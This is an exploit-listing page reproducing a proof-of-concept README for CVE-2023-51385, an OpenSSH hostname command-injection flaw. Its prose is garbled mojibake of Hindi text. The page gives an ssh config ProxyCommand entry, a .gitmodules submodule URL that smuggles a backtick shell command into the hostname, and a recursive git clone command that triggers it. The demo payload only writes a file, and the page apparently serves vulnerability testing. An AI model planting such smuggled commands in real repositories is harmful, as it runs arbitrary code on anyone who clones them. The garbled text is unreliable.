Sploitus

Exploit for CVE-2023-51385_test

kitploit ┬╖ 2026-08-28

Exploit Code

MARKDOWN37 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LTMTHINK-CVE-2023-51385_TEST
## CVE-2023-51385 рдХрд╛ рд╕рддреНрдпрд╛рдкрди

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ `~/.ssh/config` рдореЗрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕рд╛рдордЧреНрд░реА рдЬреЛрдбрд╝реЗрдВ

root@kitploit:~
    
    
    host *.example.com
      ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
    

`.gitmodules` рдлрд╝рд╛рдЗрд▓ рдХрдерди рдореЗрдВ рдХрдорд╛рдВрдб рдЗрдВрдЬреЗрдХреНрд╢рди рдореМрдЬреВрдж рд╣реИ

root@kitploit:~
    
    
    url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
    

рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдкреВрд░рд╛ рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж, рдиреАрдЪреЗ рджрд┐рдП рдЧрдП рдХрдорд╛рдВрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ

root@kitploit:~
    
    
    git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
    

рдпрджрд┐ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рддреЛ CVE-2023-51385_test рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ cve.txt рдлрд╝рд╛рдЗрд▓ рдЙрддреНрдкрдиреНрди рд╣реЛрдЧреА

![image-20240317161540677](https://assets.kitploit.com/production/public/readmes/37588/d9133f2cfc91137c8140273a71b5e9e69f64f1e43537c871e947ec5806ca4cd4.png)

рдиреЛрдЯ: OpenSSH рдХреЛ <9.6p1 рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ

рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рдпрд╣ рдмреНрд▓реЙрдЧ рдкреЛрд╕реНрдЯ рджреЗрдЦреЗрдВ:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html